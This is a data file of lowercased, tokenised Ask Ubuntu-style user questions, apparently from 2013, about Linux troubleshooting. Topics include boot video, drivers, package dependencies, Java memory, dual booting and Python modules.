351877	how to disable high-res grub2 and linux console ?	i am trying to install ubuntu 12.04.3 lts ( 32 bit server ) on an embedded computer that uses the intel n2800 cpu and chipset . i know there is no video driver for this chipset , but i do n't care because all i want is a text console ( no x windows ) . the ubuntu installation works and the resulting system can be booted . the problem is i have no video at all when it boots ( after installation is complete ) . i do see the grub boot menu during boot , but then as the linux kernel boots the video goes black . there is no x windows or graphics -- i just want a plain old 640x480 text console with 24 lines x 80 columns . i tried installing ubuntu 12.04 with the `` nomodeset '' option ( press f6 before installing ubuntu and ticking the `` nomodeset '' install option ) . this did not help -- same behavior . i think the problem may be that grub is going into a high-res mode ( which works surprisingly ) and then the kernel tries to control the graphics mode during boot , but it fails and the video goes black ( no video signal ) . i know the system boots successfully because i can plug in a usb keyboard and login and reboot the system ( i ca n't see what i 'm typing , but the system does reboot when i issue the command ) . any help is appreciated . thanks in advance .
351879	how to create a service on ubuntu ( lts 12.04 )	i have a java executable program that i can run by typing java -jar abc.jar in terminal . how can i run it as a service ? i want to run it as a service like by typing service abc start .
351880	unable to change brightness on sony eh18fa	i could n't change brightness of my sony eh18fa laptop with ubuntu 13.04 . my laptop has nvidia geforce 410m gpu . i am using ubuntu 13.04 along with windows 7 home basic . the brightness ca n't be changed using ( fn + f6 or f5 ) keys nor from system sittings , although the slider changed but the brightness of screen not changed . i tried a lot of recommended solutions but no one of them worked . i am afraid that i need install some drivers or something like that .
351885	error libswresample_0 compiling ffmpeg kubuntu 12.04	i try to compile ffmpeg in ubuntu 12.04 with this tuto but i had a error with a library so i use this to solve it : sudo apt-get update sudo apt-get -y install build-essential checkinstall git libfaac-dev libgpac-dev \ libjack-jackd2-dev libmp3lame-dev libopencore-amrnb-dev libopencore-amrwb-dev \ libsdl1.2-dev libtheora-dev libva-dev libvdpau-dev libvorbis-dev libx11-dev \ libxfixes-dev texi2html yasm zlib1g-dev and this cd git clone git : //git.videolan.org/x264 cd x264 ./configure -- enable-static make sudo checkinstall -- pkgname=x264 -- pkgversion= '' 3 : $ ( ./version.sh | \ awk -f ' [ `` ] ' '/point/ { print $ 4 '' +git '' $ 5 } ' ) '' -- backup=no -- deldoc=yes \ -- fstrans=no -- default then i have a problem with another library so i use a apt-get install to add libgsm1-dev , then i could install it , but now when i tried to execute it said : ffmpeg : relocation error : /usr/local/lib/libavfilter.so.3 : symbol swr_get_class , version libswresample_0 not defined in file libswresample.so.0 with link time reference so i look for help , and tried export ld_library_path=/usr/local/lib and sudo ldconfig -v but it did n't work , could you help me ? thz ps : when i tried to install winff with synaptic or apt-get it said that it will install ffmpeg . hello i tried but i have another error : ffmpeg : error while loading shared libraries : libx264.so.120 : can not open shared object file : no such file or directory so i make a : sudo find /usr -iname 'libx264.so . *' but i had a newest version : /usr/local/lib/libx264.so.138 what i could do ? thz , lordneckbeard the link that you post move me to aacencodingguide , but if is the guide in the oficcial web i used it too , thz
351886	reload http_proxy , no_proxy	i am running ubuntu with awesome wm . i have confirmed in chromium , i can use the environment variables http_proxy and no_proxy to control the proxy chromium uses . i do n't think chromium reads these variables directly but chromiuim must use whatever reads them . however , when i change these variables i am forced to reboot the machine to get chromium ( or whatever reads these ) to pick up the changes . is there a way for me to reload these changes without rebooting ubuntu ? can i restart some subsystem or send a signal to reload the changes ? i have tried starting a new shell , exporting the changes to the variables then launching chromium from that shell . this still does not pick up the changes .
351887	running remote x11 applications with unity menu and look and feel	how do i configure a server ( 12.10 - 13.10 ) to run remote x applications using the unity menu and look and feel ? i can run applications fine by logging into the server from my desktop , like so : # ssh -y < servername > # gedit but the application does n't run with the same look-and-feel as the rest of the applications on the screen . all suggestions gratefully received !
351898	building ghc 7.6.3 on ubuntu 13.04 leads to error in dynflags.hs	i 'm trying to build ghc following the directions here : how to install haskell platform for ubuntu 13.04 ? i keep getting : hc [ stage 1 ] compiler/stage2/build/dynflags.p_o killed make [ 1 ] : *** [ compiler/stage2/build/dynflags.p_o ] error 137 make : *** [ all ] error 2 i think i 'm probably missing a dependency , but i have no idea which .
351899	qgis ( quantum gis ) install fails , unmet dependencies	i get the following error when trying to install qgis 2.0.1.2 on ubuntu 12 or ubuntu 13 i 'm using this tutorial : http : //www.digital-geography.com/install-qgis-2-0-on-ubuntu/ - the following packages have unmet dependencies : - qgis : depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20.1 is to be installed - depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.2-2ubuntu1 is to be installed - depends : libgdal1-1.7.0 but it is not going to be installed - depends : libgeos-c1 ( > = 3.2.2 ) but 3.3.8-2~quantal1 is to be installed - depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed - depends : libqt4-sql ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed - depends : libqt4-svg ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed - depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed - depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed - depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed - depends : libqtwebkit4 ( > = 2.2~2011week36 ) but 2.2.1-4ubuntu1 is to be installed - depends : libspatialite3 ( > = 2.4.0~rc2 ) but 3.1.0~rc2-2~quantal2 is to be installed - depends : libsqlite3-0 ( > = 3.5.9 ) but 3.7.13-1 is to be installed - depends : libstdc++6 ( > = 4.4.0 ) but 4.7.2-2ubuntu1 is to be installed - depends : qgis-providers ( = 2.0.1-2+precise1 ) but 2.0.1-2+precise1 is to be installed - depends : qgis-common ( = 2.0.1-2+precise1 ) but 2.0.1-2+precise1 is to be installed after installing ubuntu 13.04 i have less unmet dependencies : depends : python-qgis-common ( = 2.0.1-2 + precise1 ) but it is not installable - depends on : libqgis2.0.1 but it is not installable - depends on : sip-api-8.1 but it is not installable - qgis : - depends on : libgdal1-1.7.0 but it is not installable - depends on : libqgis2.0.1 but it is not installable - depends : but qgis-providers ( = 2.0.1-2 + precise1 ) should not be installed - recommends : qgis-plugin-globe but it is not installable - qgis-plugin-grass : - depends on : libgdal1-1.7.0 but it is not installable - depends on : libqgis2.0.1 but it is not installable - depends on : grass641 but it is not installable - e : problems can not be corrected , you have held broken packages back .
351901	braven 600 bluetooth speaker does n't play back audio 13.04	i 'm having issues with getting audio to actually play through my bluetooth speaker . it will connect fine , and in bluetooth settings , it will say that it is paired . however , no matter how many times i click to turn on the connection here , it will not say on . also , the speaker does n't appear as an output device in sound . not really sure what 's wrong here , and i believe all the relevant packages installed .
351905	redis install : unsupported locale setting	i am trying to install redis like here . but when do make , got error unsupported locale setting : # make sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.3 python version : 3.3.1 final 0 distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring exception information : unsupported locale setting traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/commandnotfound/util.py '' , line 24 , in crash_guard callback ( ) file `` /usr/lib/command-not-found '' , line 69 , in main enable_i18n ( ) file `` /usr/lib/command-not-found '' , line 40 , in enable_i18n locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python3.3/locale.py '' , line 541 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting
351908	hadoop on ubuntu desktop 13.04	how do i install hadoop on ubuntu desktop 13.04 ( 64 bit ) running inside vmware player on windows 8
351912	ubuntu x64 server java gives `` could not reserve enough space for object heap ''	i have an ubuntu server without x. i installed java with the following command : apt-get install default-jre-headless here 's some more info from my server : root # df filesystem 1k-blocks used available use % mounted on /dev/simfs 52428800 5409688 47019112 11 % / tmpfs 524400 0 524400 0 % /lib/init/rw tmpfs 524400 0 524400 0 % /dev/shm root # free total used free shared buffers cached mem : 1048800 492480 556320 0 0 0 -/+ buffers/cache : 492480 556320 swap : 0 0 0 root # ulimit -a core file size ( blocks , -c ) 0 data seg size ( kbytes , -d ) unlimited scheduling priority ( -e ) 0 file size ( blocks , -f ) unlimited pending signals ( -i ) 16382 max locked memory ( kbytes , -l ) 64 max memory size ( kbytes , -m ) unlimited open files ( -n ) 1024 pipe size ( 512 bytes , -p ) 8 posix message queues ( bytes , -q ) 819200 real-time priority ( -r ) 0 stack size ( kbytes , -s ) 8192 cpu time ( seconds , -t ) unlimited max user processes ( -u ) unlimited virtual memory ( kbytes , -v ) unlimited file locks ( -x ) unlimited root # uname -a linux 307488 2.6.32-308.el5.028stab099.3 # 1 smp wed mar 7 15:56:00 msk 2012 x86_64 gnu/linux the server is a virtual machine . i do not have power to give it more memory . here 's the problem : when i try running java , it gives the following errors : root # java error occurred during initialization of vm could not reserve enough space for object heap could not create the java virtual machine . running it with these commands will work , but is not enough to run my jar file : root # java -xms220m -xmx220m -version java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.6 ) ( 6b27-1.12.6-1~deb6u1 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) if i increase it slightly , it will give the following error : root # java -xms320m -xmx320m error occurred during initialization of vm java.lang.outofmemoryerror : unable to create new native thread at java.lang.thread.start0 ( native method ) at java.lang.thread.start ( thread.java:657 ) at java.lang.ref.reference. < clinit > ( reference.java:162 ) but if i increase it more it gives the same error as just typing `` java '' does . as you can see , i 'm testing as root , so there should not be privilidge issues . with the available memory , i would think there should at least be enough to run it with 512mb . what can i do ? thanks
351914	wireless network	i recently moved from microsoft windows 8 to ubuntu 12.04 . i have dell inspiron 3521 but the wireless or wifi is not working . i tried through additional drivers but a message is alerted that proprietary drivers are not available or suppoted . check var/log/jockey . please help me regarding this problem as i need much to solve this . thanks . output for lspci is : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) output forsudo lshw -c network is : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 05 serial : e0 : db:55 : da : b4:2c size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.2 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0500000-c0507fff output for rfkill list all is : 1 : hci0 : bluetooth soft blocked : no hard blocked : no
351919	which xserver-xorg-video-ati package should be used on ubuntu 12.04 ?	i 'm on 12.04 precise with an amd radeon 6520g graphics card ( using the open source driver which supports my card ) , and i am having problems with my display resolution stuck on 1024x768 to fix this , i 'm trying to reinstall my drivers as recommended in these askubuntu posts one and two which instructs to reinstall xserver-xorg-video-ati but i noticed that i do not have that installed , instead xserver-xorg-video-ati-lts-quantal is installed although i am on precise . so , what 's the difference between these 2 packages and xserver-xorg-video-ati-lts-raring ? which one should i use in my context , for someone who wants to use the open source radeon drivers on ubuntu 12.04 ? very similarly , there 's also the xserver-xorg-core package which is currently not installed and also has same name styling packages . more searching led me to https : //wiki.ubuntu.com/kernel/ltsenablementstack the lts stack , which means that newer kernels and x stacks ( stacks , being many x-related programs that are dependent on each other ) are brought in from , but i 'm unsure whether one is most appropriate for 12.04 especially in my system that uses the radeon module . also : how to upgrade ubuntu 12.04.2 to ubuntu 12.04.3
351922	error : no such device grub rescue	i just installed ubuntu 12.04 ls alongside windows vista . i used a usb , i tried ubuntu and then clicked on `` install ubunutu 12.04 ls '' . i used the standard installation on an internal drive and chose a 85 gigabytes partition for ubuntu . everything seemed to go fine . i rebooted my system and got the error : error : no such device : random number grub rescue > therefore i do n't have access to ubuntu or to windows vista . i tried to reinstall ubuntu from the usb , got the same error , them i tried boot-repair from a booted usb , and i still have the same error . here is a link the the boot-info generated by boot repair . any advice would be appreciated . thanks
351923	deleted old version of kernel to free up space - now getting nonstop errors	my /boot partition was full , so i deleted an old version of the kernel to free up space , so i deleted the following files in /boot : abi-3.8.0-25-generic config-3.8.0-25-generic initrd.img-3.8.0-25-generic system.map-3.8.0-25-generic vmlinuz-3.8.0-25-generic but now , whenever i do anything in apt-get , it throws errors , for example : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-extra-3.8.0-25-generic ( 3.8.0-25.37 ) ... internal error : could not find image ( /boot/vmlinuz-3.8.0-25-generic ) dpkg : error processing linux-image-extra-3.8.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-extra-3.8.0-25-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is there any way i can fix this now that i stupidly did n't back up the files i deleted ? $ dpkg -l linux-image-* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-===============================================-============================-============================-=================================================================================================== un linux-image-3.0 < none > ( no description available ) rc linux-image-3.5.0-17-generic 3.5.0-17.28 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-3.5.0-25-generic 3.5.0-25.39 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-3.5.0-26-generic 3.5.0-26.42 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-3.5.0-27-generic 3.5.0-27.46 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-21-generic 3.8.0-21.32 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-22-generic 3.8.0-22.33 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-23-generic 3.8.0-23.34 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-25-generic 3.8.0-25.37 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-26-generic 3.8.0-26.38 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-29-generic 3.8.0-29.42 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-32-generic 3.8.0-32.47 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.5.0-17-generic 3.5.0-17.28 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-extra-3.5.0-25-generic 3.5.0-25.39 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-extra-3.5.0-26-generic 3.5.0-26.42 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-extra-3.5.0-27-generic 3.5.0-27.46 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-21-generic 3.8.0-21.32 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-22-generic 3.8.0-22.33 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-23-generic 3.8.0-23.34 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp if linux-image-extra-3.8.0-25-generic 3.8.0-25.37 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-26-generic 3.8.0-26.38 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-29-generic 3.8.0-29.42 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-32-generic 3.8.0-32.47 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-generic 3.8.0.32.50 amd64 generic linux kernel image $ sudo apt-get -- reinstall install linux-image-extra-3.8.0-25-generic reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 8 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . e : internal error , no file name for linux-image-extra-3.8.0-25-generic : amd64
351926	dual booting windows 7 alongside ubuntu 13.04 after installing ubuntu	i have an ubuntu 13.04 pc . now , using gparted i have partitioned an ntfs file system to install windows 7 . but it seems that windows 7 did not install any of the partition stating the selected partition is of type gpt . now moreover trying to format , i have formatted my grub bootloader . so i ca n't boot to ubuntu either . now i have a live ubuntu usb . but before fixing the grub , i would like to know how can i install windows without deleting my entire ubuntu and hard-disk ? i ca n't do that . i have formatted the partition to ntfs using gparted . why does windows still give me the gpt error ? is there any way to do it ? or someone please tell me to stop trying .
351927	game does n't work on full screen because of unity and menu panel	i have a little problem with a game . i install it , i did open it , works on full screen resolution , but i dont know why unity panel and menu panel are still there ( i can see them ) when game its open . problem its my mouse cursor , its reaching screen limit ( left , rigth , up and down ) and i cant play very well . i did look a bit here and i did n't found and answer . i hope its a not very idiotic question , i 'm noob on ubuntu . cheers !
351928	installed ubuntu 13 on windows 7 through vmware but gives error `` piix4_smbus host smbus controller not enabled ''	i installed ubuntu 13 on windows 7 through vmware but after installing gives `` piix4_smbus host smbus controller not enabled '' when it loads the os for the first time it comes with black screen and asking for username & password . after giving typing in the login-data it does n't load ubuntu , but only shows a black screen . i am using linux for the first time , so please help me getting this sorted . ( step by step guide ) i red some answers , saying to open /etc/modprobe.d/blacklist.conf and a line , but i do n't know how to do it . i typed this /etc/modprobe.d/blacklist.conf once and enter , but it says permission denied though i am login into my account
351930	deja dup backup : limit drive space usage and force full backups only	good day , i have configured deja dup to backup my home folder and a couple other locations to a folder on a spare drive of mine , /media/backupdrive/mybackups . i have made some minor changes to gnupg , as noted in another post ( automated backups + encryption ) so that it uses aes256 for encryption . i have two problems with deja dup though : it seems that it performs an initial full backup , and then differential backups afterwards . i do n't see any way to control the backup types with finer granularity . since it 's backing up large ( 50gb+ ) encrypted binary archives , i do n't want it doing differential backups . i just want it to do full/complete backups each time , and never attempt differential or incremental backups . is this possible ? it also seems that backups will continue each week until the drive runs out of space , at which point deja dup will supposedly delete the oldest backups to make room for new backups . is there a way to cap how many gb in size the backup folder can be , rather than allowing deja dup to fill up the entire drive ? i guess i could just re-partition the drive mounted at /media/backupdrive , but i 'd like to avoid that at the moment if i can . thank you all in advance .
351933	ubuntu download	hi first time here and considering changing from windows vista , just need to know a few bits . i have a 'toshiba p100 laptop ' but the preloaded vista has sort of corrupted and no longer works . i am missing about 30 'odd ' gb of disk-space and now operating somewhere between 64-69gb . i assume , that the rest of a 100gb hdd is taken up with windows . i 've done all the stuff to claw back as much as i could , so if i install ubuntu what will i have to work with . do i format the hdd and start from scratch or is it only install over windows .
351934	firefox history & bookmarks do n't save , tried everything in the book	now , before i begin , i would like to say that i am a fairly advanced user . i know how things work , and i troubleshoot . therefore as such , i have deleted my profile , recreated it , tested new ones , deleted .mozilla , purged , reinstalled , checked about : config ( and changing values which seem to contradict saving history ) , deleted firefox and xmarks , and even manually deleted the folders and remade them . the .mozilla directory has all my user permissions . i made sure of this . clearing history does not generate a new one . history is set to be remembered , and is not set to clear when firefox closes . i have already checked . if creating a new profile does n't solve my issue , then how can places.sqlite be the problem ( as is suggested over at mozilla 's mozine/kb ) ? i 've already deleted my firefox profiles countless times and made countless more new ones , so i hardly doubt it 's that now . main issue : i open firefox , i browse , and no history is ever saved when i restart the browser . no bookmarks get saved either , and if i bookmark a page ( sometimes before it has n't even let me ) , it wo n't even show up in the bookmarks menu . and it 's also worth noting that the history always never saves either . what does work : firefox preferences are saved , add-ons , configurations , downloads , extensions , and anything else that is n't explicitly bookmarks or browsing history . do n't know about form history since i do n't use that . i use firefox 24 on ubuntu 13.04 . please help me , i 've run out of options and ideas !
351938	second monitor full screen 12.04	i have just got a 2nd screen . connected it and now each of my 4 workspaces is made of 2 screens . when i try making windows full screen on the 2nd monitor- some of them can become full screen on the 2nd monitor , and some of them jump to the 1st . programs i can extend to full screen on the 2nd monitor : terminal , image viewer , simple scan . programs i ca n't : lyx , cromium , firefox , libre office , software center , folders , pdf reader , geany . why is it happening ? how can i work it out ? thank you , marina
351939	installing ubuntu from usb drive	i used both programs from http : //pendrivelinux.com . whenever i boot from usb and choose install to hard drive , it stucks at : nouveau [ vbios ] [ 0000:01:00.0 ] checking pramin for image how to fix this ?
351943	screen glitches or freezes after screen lock with intel video driver	i 'm running 13.04 , and have an intel hd 5200 display , using the intel drivers . when the screen times-out and locks , most of the time one of two things happens : either the current windows are still visible but frozen the screen is black and frozen in either case the mouse pointer is movable , but i do not get the dialog for typing my password to unlock the screen . but , if i switch to a vt and back ( e.g . by pressing ctrl + alt + f2 then ctrl + alt + f7 ) the login dialog appears immediately . i 've searched all over the net for a few days and can not find a remedy , though i can occasionally find someone else complaining of basically the same issue , such as here : 12.04 - screen glitches / freezes after `` lock screen '' though i 've a different version of ubuntu , and a different intel video chip . the work-around to ( of switching to vt and back ) would be livable if it were n't for the fact that the contents of my screen are visible when it is locked up this way ! any solutions out there ?
351944	how can i set a persistant proxy server setting for the guest account ?	i am using ubuntu 12.04 at work and we have a proxy server . i would like to allow guests to use my computer on the guest account , but i can not get the proxy settings to stay . is there a way to set the proxy setting automatically at log-in for the guest account ? the askubuntu question change default guest session launcher applications ? shows how to configure the launcher icons . can i use this file to set a persistent proxy server setting ? if so , how ?
351946	my screen resolution is not listed	i am trying to set a custom resolution in ubuntu . my flat screen monitor is 1440x900 but this resolution is not listed under `` displays '' settings . the only options available are 1920x1080 ( which i am using right now ) , 1280x720 and 720x576 . '' nvidia x server settings detects my display as a `` cvte tv 1920x1080 ( dfp-1 ) '' . nvidia x server settings does not allow me to set a custom `` viewportout '' as it comes back to default after applying settings . in windows my display was not detected automatically , but all i had to do was set a custom resolution in nvidia control panel and it worked perfectly . i 'm running ubuntu 13.04 with nvidia proprietary driver ( for gtx 570 ) . i have tried hdmi and dvi > vga connections and both do n't list my resolution . is there a way to set a custom resolution in ubuntu that is displayed properly ? description : vga compatible controller product : gf110 [ geforce gtx 570 rev . 2 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f6000000-f6ffffff memory : e8000000-efffffff memory : f2000000-f3ffffff ioport : dc00 ( size=128 ) memory : f7d00000-f7d7ffff
351948	touchpad t650 not clicking	so i 'm running xubuntu 13.10 and i 'm upgrading my laptop soon so i got a wireless keyboard ( works great with no problems ) and the logitech t650 , now currently i can only move the pointer about , i cant click or do any gesture . i used xev and the clicks were not picked up only the movements were , i then used my touch-pad on my netbook to see what the clicks would register as to make sure i did n't miss anything and i never . is there anyway to add the click functionality or am i stuck with a paper weight until i get my new computer ?
351949	no smb.conf file after installing samba 4.0.9	samba wo n't start and i 've done 'locate smb.conf ' but it ca n't be found . i cd 'd to '/usr/local/samba/etc/ ' and not in '/etc/samba/ ' either . the samba path in in '/etc/environment ' so i can start samba with 'service samba4 start ' but it wo n't start . how can i repair this problem ? can i just copy a smb.conf from another samba server ?
351950	nautilus does n't work ... . from command or from unity	i had a little bit of a problem when i uninstalled gnome3 from my laptop ( made it slower ) , and packages might have uninstalled a few things that nautilus needed in that process . now , when i click nautilus from unity side bar , it does n't do anything . i type nautilus in terminal , and this is what it outputs : tommydrum @ crazypeople-ubuntu : ~ $ nautilus could not register the application : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gtk.actions ' on object at path /org/gnome/nautilus when i right click nautilus from unity and click a subfolder , it works , but not when i type nautilus /home/tommydrum/downloads . when i run nautilus as root , this happens ( it does work , but this is output ) : tommydrum @ crazypeople-ubuntu : ~ $ sudo -i nautilus [ sudo ] password for tommydrum : ( nautilus:14182 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files initializing nautilus-dropbox 1.4.0 initializing nautilus-open-terminal extension ( opens now.. ) ( then i close it , goes back to commandline ) any ideas what package i could reinstall ? or what package i might have uninstalled by accident .
351952	scrolling in firefox and chromium	i ca n't scroll fast in firefox and chromium ( in the rest of the system it 's fast enough ) . i did some research and found i had to type about : config in firefox and change something there and i ca n't find the setting i had to change ( mouse.withnokey ) . i use well known hp mouse .
351955	how to install a windows 7 disk with ubuntu 13.04 in a uefi computer ?	i used the entire disk to install ubuntu.now i want to install windows 7.what should i do so that i dont have to do anything to my ubuntu data.i have plenty of free space . ( window 's os does n't show up in my dell inspira4tion 14r laptop at the uefi options in the boot menu pressing f2 . ) my ubuntu os is 64 bit uefi .
351959	hp probook 6450b webcam not working 13.04	i recently installed ubuntu 13.04 on my hp probook 6450b . i am really impressed , but one thing is not working : the webcam . i tried skype , i tried cheese , i tried chatroulette , nothing worked . please help ! thanks in advance . : )
351963	how to back up all the data software in ubuntu ?	i tried installing windows alongside ubuntu . but it 's impossible process with uefi . so the thing i want to do is . delete all partition and install windows . than re-install ubuntu 13.04 . now the problem is , i have important softwares and document's.my document 's are synced with ubuntu1 . so i am not tensed about that . the thing i am tensed about is my softwares . how do create backup for and restore the softwares ?
351969	unity icon issue and desktop icons not appearing	screenshot of problems i 'm having recently i have been having problems with my unity launcher and desktop . as you can see in the picture , when i log in , my desktop icons do n't show up . my profile logs in , but the login box stays and my icons do n't appear . it is not until i start files that my icons return . what can i do to get my icons back without having to start the file explorer every time i start up ? also , as seen in the picture , my unity launcher does n't give launched app icons a coloured background like it used to , making it harder to see which programs are active in the background . in addition to that , the unity launcher is no longer partly translucent , showing the background underneath . how can i fix these other two issues ? thanks .
351970	laptop lid closed - with external monitor	how to work on my other monitor when i close my laptop 's lid ? i connect my external monitor ( hdmi ) to my laptop and then close the lid . normally it ( should ) display everything on the external one . but what its doing ? shutting down both monitors and if i want to do something there is absolutly no reaction , black screen , no saved work , can do nothing , great ! ( ssh into system is no solution for mobility ) i found solutions with system-inhibt , gconf and /etc/.. but nothing seems to work on wether gnome/unity . the only working solution as de is kde . there are no problems , always correctly managed . many people already told problems with the removal of these options in gnome , but its ignored . because it has to be mac-ish , and gnome has to be less options in cost of really needed functions . disgusting . gnome 3.8-3.10 unity ( 13.04 - dev branch )
351975	lexmark e240 & cups	i have installed an e240 lexmark printer in ubuntu 13.04 using the official drivers from http : //support.lexmark.com/index ? segment=support & userlocale=en_us & locale=en & productcode=lexmark_e240n & page=product & frompage=null # 2 ( intented for 12.04 ) . i managed to print only one document at a time ( no matter how many pages ) . if i sent another document it printed nonsense ( i had to turn the printer off and on before sending something else , to ensure proper printing ) . from the cups administration page ( localhost:631 ) i chose the `` reject jobs '' ( from maintenance ) . as expected nothing could be printed . then i tried to return it to the previous condition but with no luck . only the top blue light is on while the `` continue '' button light ( with symbol < | > ) is off . it only prints test pages . i made a new fresh installation of ubuntu 13.10 this time , again with the same drivers ( in cups i chose e238 ) but it still behaves the same . notice : from windows 7 i can print i.e . the printer has no malfunction . thank you
351976	how to install requests module for python 3.2 by using pip install ?	i have ubuntu 12.04 with python 2.7 and 3.2 following this page i installed requests module . $ sudo pip install requests however , it only works for python 2 but not python 3 : $ python python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import requests traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named requests > > > how should i install the requests module so it can work for both my python versions ?
